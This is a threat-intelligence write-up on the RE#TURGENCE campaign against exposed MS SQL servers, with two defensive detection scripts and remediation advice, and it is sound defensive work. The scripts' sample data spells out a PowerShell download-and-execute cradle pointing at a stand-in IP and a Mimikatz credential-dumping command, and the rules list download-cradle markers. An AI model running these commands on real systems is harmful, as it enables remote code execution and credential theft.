Global Exploitation of Vulnerable MS SQL Servers by Turkish Hackers

A financially motivated campaign targeting poorly secured Microsoft SQL (MS SQL) servers in the United States, the European Union and Latin America (LATAM) has been attributed to threat actors of Turkish origin and designated RE#TURGENCE by researchers at Securonix. The campaign is ongoing and follows a consistent multi-stage pattern: brute-force access to exposed servers, operating-system command execution through the xp_cmdshell extended stored procedure, a post-exploitation toolkit built largely from legitimate administration software, and finally ransomware deployment for extortion. The reliance on legitimate tooling rather than custom malware is what makes the intrusions hard to distinguish from normal administrative activity.


Technical Details:

The actors compromise poorly secured MS SQL servers by brute-forcing logins and then abusing the xp_cmdshell extended stored procedure to run operating-system commands on the host. The intrusion proceeds in stages:

  • Initial Access: Brute force on MS SQL servers.
  • Exploitation: Use of xp_cmdshell to execute commands.
  • Payload: Retrieval of Cobalt Strike via PowerShell.
  • Toolkit: AnyDesk downloaded for remote access, along with Mimikatz for credential harvesting and Advanced Port Scanner for reconnaissance.
  • Lateral Movement: PsExec utility for executing programs on remote hosts.
  • Ransomware: Deployment of Mimic ransomware for financial motives.
  • OPSEC Blunder: Monitoring clipboard activity reveals Turkish origins and online alias "atseverse."
  • Differentiation: Unique characteristics distinguish RE#TURGENCE from prior campaigns, emphasizing the use of legitimate tools.


Initial Access:

The threat actors gain initial access by brute-forcing logins on internet-exposed MS SQL servers, the same entry method used in the earlier DB#JAMMER campaign (September 2023). Once authenticated with a sufficiently privileged account, they enable the xp_cmdshell extended stored procedure, which is disabled by default and must be switched on with sp_configure, and use it to run shell commands on the underlying Windows host, typically in the security context of the SQL Server service account.
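The entry sequence above (a burst of failed logins, a success from the same client, then xp_cmdshell being switched on) leaves traces in the SQL Server ERRORLOG: error 18456 login failures carry the client address, and every sp_configure change is logged as a "Configuration option ... changed" message. The script below is an added example written for this page, not Securonix's or the actors' code; it parses constructed ERRORLOG lines in the default format and flags the three stages. The client IPs, timestamps, session IDs and the thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed SQL Server ERRORLOG excerpt (sample data, not from the incident).
# Layout follows the default ERRORLOG format: timestamp, source column, message.
SAMPLE_ERRORLOG = """\
2024-01-08 10:15:01.12 Logon       Error: 18456, Severity: 14, State: 8.
2024-01-08 10:15:01.12 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2024-01-08 10:15:01.31 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2024-01-08 10:15:01.52 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2024-01-08 10:15:01.77 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2024-01-08 10:15:02.04 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2024-01-08 10:15:02.29 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2024-01-08 10:15:09.00 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 203.0.113.5]
2024-01-08 10:15:12.55 spid58      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-01-08 10:15:12.80 spid58      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-01-08 10:20:00.00 Logon       Login failed for user 'appuser'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.23]
"""

LINE_RE = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d\d)\s+(\S+)\s+(.*)$")
FAIL_RE = re.compile(r"Login failed for user '([^']+)'.*\[CLIENT: ([^\]]+)\]")
OK_RE = re.compile(r"Login succeeded for user '([^']+)'.*\[CLIENT: ([^\]]+)\]")
CONF_RE = re.compile(r"Configuration option '([^']+)' changed from (\d+) to (\d+)")


def parse_errorlog(text):
    """Yield (timestamp, source, message) for each well-formed ERRORLOG line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S.%f"), m.group(2), m.group(3)


def analyze_errorlog(text, threshold=5, window=timedelta(seconds=60), followup=timedelta(minutes=10)):
    """Return a list of (severity, finding) tuples.

    Stage 1: a client that accumulates `threshold` failed logins inside `window` is a brute-force source.
    Stage 2: a later successful login from that client means the brute force worked.
    Stage 3: xp_cmdshell flipped from 0 to 1 within `followup` of such a login is the RE#TURGENCE pattern.
    """
    findings = []
    failures = defaultdict(list)   # client -> timestamps of recent failed logins
    brute_clients = set()          # clients already flagged as brute-force sources
    compromised_at = None          # time of the first successful login from a flagged client

    for ts, _src, msg in parse_errorlog(text):
        m = FAIL_RE.search(msg)
        if m:
            user, client = m.groups()
            recent = [t for t in failures[client] if ts - t <= window] + [ts]
            failures[client] = recent
            if len(recent) >= threshold and client not in brute_clients:
                brute_clients.add(client)
                findings.append(("medium", f"{len(recent)} failed logins for '{user}' from {client} within {window.seconds}s"))
            continue
        m = OK_RE.search(msg)
        if m:
            user, client = m.groups()
            if client in brute_clients:
                compromised_at = compromised_at or ts
                findings.append(("high", f"successful login for '{user}' from brute-force source {client}"))
            continue
        m = CONF_RE.search(msg)
        if m and m.group(1) == "xp_cmdshell" and m.group(3) == "1":
            if compromised_at and ts - compromised_at <= followup:
                delay = int((ts - compromised_at).total_seconds())
                findings.append(("critical", f"xp_cmdshell enabled {delay}s after brute-forced login"))
            else:
                findings.append(("high", "xp_cmdshell enabled (review change control)"))
    return findings


if __name__ == "__main__":
    for severity, finding in analyze_errorlog(SAMPLE_ERRORLOG):
        print(f"[{severity}] {finding}")
```

Failed-login messages only appear in the ERRORLOG when login auditing covers failed logins (the default setting), and the xp_cmdshell change is logged regardless; enabling xp_cmdshell is rare enough in production that the last rule is worth an alert even without the preceding brute-force context.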


Post-Exploitation Toolkit:

Once initial access is achieved, the attackers use xp_cmdshell to launch PowerShell, which retrieves a script from a remote server. That script is responsible for fetching an obfuscated Cobalt Strike beacon payload, giving the actors a command-and-control channel for the rest of the intrusion.


Tool Utilization:

The post-exploitation phase involves downloading the AnyDesk remote desktop application from a network share, giving the actors interactive remote access to the compromised machine through a legitimate, signed program. Additional tools, Mimikatz for credential harvesting and Advanced Port Scanner for internal reconnaissance, are then downloaded to the compromised system.


Lateral Movement:

PsExec, a legitimate Sysinternals administration utility, is leveraged for lateral movement: it copies a service binary to a remote Windows host over SMB and uses it to execute programs there. PsExec needs valid credentials for the target, which is why credential harvesting precedes this stage. With it the threat actors can maneuver within the network and expand their reach well beyond the initial database server.
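The post-exploitation steps in the preceding three sections (xp_cmdshell spawning a shell that launches a PowerShell download cradle, AnyDesk run from a share, Mimikatz, and PsExec's service starting on a remote host) all surface as process-creation events, for example Sysmon Event ID 1. The script below is an added example, not code from Securonix or from the actors; it runs a small rule set over constructed process-creation records and reports which hosts show the full xp_cmdshell-to-download chain. Hostnames, paths, the download URL and the rule names are assumptions.

```python
import ntpath

# Constructed process-creation records in the spirit of Sysmon Event ID 1
# (sample data, not telemetry from the incident). Hosts, paths and the URL are assumptions.
SAMPLE_EVENTS = [
    {"host": "SQL01", "user": r"NT Service\MSSQLSERVER",
     "parent": r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/p.ps1')\""},
    {"host": "SQL01", "user": r"NT Service\MSSQLSERVER",
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/p.ps1')\""},
    {"host": "SQL01", "user": r"NT Service\MSSQLSERVER",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"\\FS01\share\AnyDesk.exe", "cmdline": "AnyDesk.exe"},
    {"host": "SQL01", "user": r"NT Service\MSSQLSERVER",
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\Public\mimikatz.exe",
     "cmdline": 'mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit'},
    {"host": "FS01", "user": r"NT AUTHORITY\SYSTEM",
     "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\PSEXESVC.exe", "cmdline": r"C:\Windows\PSEXESVC.exe"},
    # Benign: IT-deployed AnyDesk in Program Files, started by a user from the desktop.
    {"host": "WKS07", "user": r"CORP\jdoe",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\AnyDesk\AnyDesk.exe", "cmdline": "AnyDesk.exe"},
    # Benign: an ordinary service host start.
    {"host": "SQL01", "user": r"NT AUTHORITY\SYSTEM",
     "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
]

SHELLS = ("cmd.exe", "powershell.exe", "pwsh.exe")
CRADLE_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "net.webclient",
                  "-encodedcommand", "frombase64string")
TRUSTED_PREFIXES = ("c:\\program files\\", "c:\\program files (x86)\\")


def base(path):
    """Lower-cased file name of a Windows path (ntpath also understands UNC paths)."""
    return ntpath.basename(path).lower()


def apply_rules(ev):
    """Return the names of the detection rules that fire for one process-creation event."""
    img, parent, cmd = base(ev["image"]), base(ev["parent"]), ev["cmdline"].lower()
    hits = []
    # xp_cmdshell runs its command as a child of the database engine process.
    if parent == "sqlservr.exe" and img in SHELLS:
        hits.append("sqlservr_spawned_shell")
    # Download cradles used to stage the next payload (here, the beacon loader script).
    if img in ("powershell.exe", "pwsh.exe") and any(m in cmd for m in CRADLE_MARKERS):
        hits.append("powershell_download_cradle")
    # AnyDesk is legitimate; the signal is where it runs from (a share or user-writable path).
    if img == "anydesk.exe" and not ev["image"].lower().startswith(TRUSTED_PREFIXES):
        hits.append("anydesk_from_untrusted_path")
    if img == "mimikatz.exe" or "sekurlsa::" in cmd:
        hits.append("credential_dumping")
    # PsExec copies its service binary (PSEXESVC.exe by default) to the target and
    # starts it through the Service Control Manager, so services.exe is the parent.
    if img == "psexesvc.exe" and parent == "services.exe":
        hits.append("psexec_service_started")
    return hits


def detect(events):
    """Run every rule over every event; returns (host, rule) pairs in event order."""
    return [(ev["host"], rule) for ev in events for rule in apply_rules(ev)]


def hosts_with_chain(findings):
    """Hosts where the database engine spawned a shell AND a download cradle ran,
    i.e. the xp_cmdshell -> PowerShell -> payload sequence described above."""
    by_host = {}
    for host, rule in findings:
        by_host.setdefault(host, set()).add(rule)
    return sorted(h for h, rules in by_host.items()
                  if {"sqlservr_spawned_shell", "powershell_download_cradle"} <= rules)


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for host, rule in found:
        print(f"{host}: {rule}")
    print("full chain on:", hosts_with_chain(found))
```

The rules are deliberately narrow: a shell whose parent is sqlservr.exe is almost never legitimate, whereas AnyDesk and PsExec are both used by real administrators, so those rules key on the install path and the service parent rather than on the tool name alone. PsExec's service name can be changed with its -r switch, so the last rule is a baseline, not a complete PsExec detector.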


Ransomware Deployment:

The attack chain concludes with the deployment of Mimic ransomware, a family previously seen in the DB#JAMMER campaign. Where RE#TURGENCE differs is its heavier reliance on legitimate tools such as AnyDesk and PsExec that blend into normal administrative activity, which makes the intrusion harder to spot before encryption begins.


Operational Security Oversight:

Securonix uncovered an operational security (OPSEC) mistake by the threat actors. Because AnyDesk's clipboard-sharing feature was left enabled, the researchers were able to observe the actors' clipboard contents. That lapse revealed the Turkish origin of the attackers and their online alias, 'atseverse', which corresponds to profiles on Steam and on a Turkish hacking forum called SpyHack.


Remediation Steps:

  • Network Segmentation: Do not expose MS SQL (TCP 1433 by default) directly to the internet; keep database servers behind firewalls or VPN access so external brute-force attempts never reach the listener.
  • Enhanced Authentication: Enforce strong password policies, disable or rename the sa login where possible, prefer Windows authentication over SQL logins, and keep failed-login auditing on so brute-force bursts are visible in the ERRORLOG.
  • Disable xp_cmdshell: Leave the option at its default (off) and alert on any configuration change that enables it; this single control breaks the step that turns a database login into operating-system command execution.
  • Regular Audits: Conduct routine security audits, including vulnerability assessments and reviews of SQL Server configuration, to identify and patch weaknesses before attackers do.
  • Application Whitelisting: Limit execution to authorized applications so that unapproved binaries such as Mimikatz, Advanced Port Scanner or a freshly downloaded PsExec cannot run, and monitor for known administration tools appearing on servers where they were never deployed.
  • Remote-Access Tool Control: Block or alert on the installation of unapproved remote desktop software such as AnyDesk. The attackers' own clipboard-sharing setting is what exposed them in this campaign; defenders should not count on such lapses and should treat any unexpected remote-access client on a database server as an incident.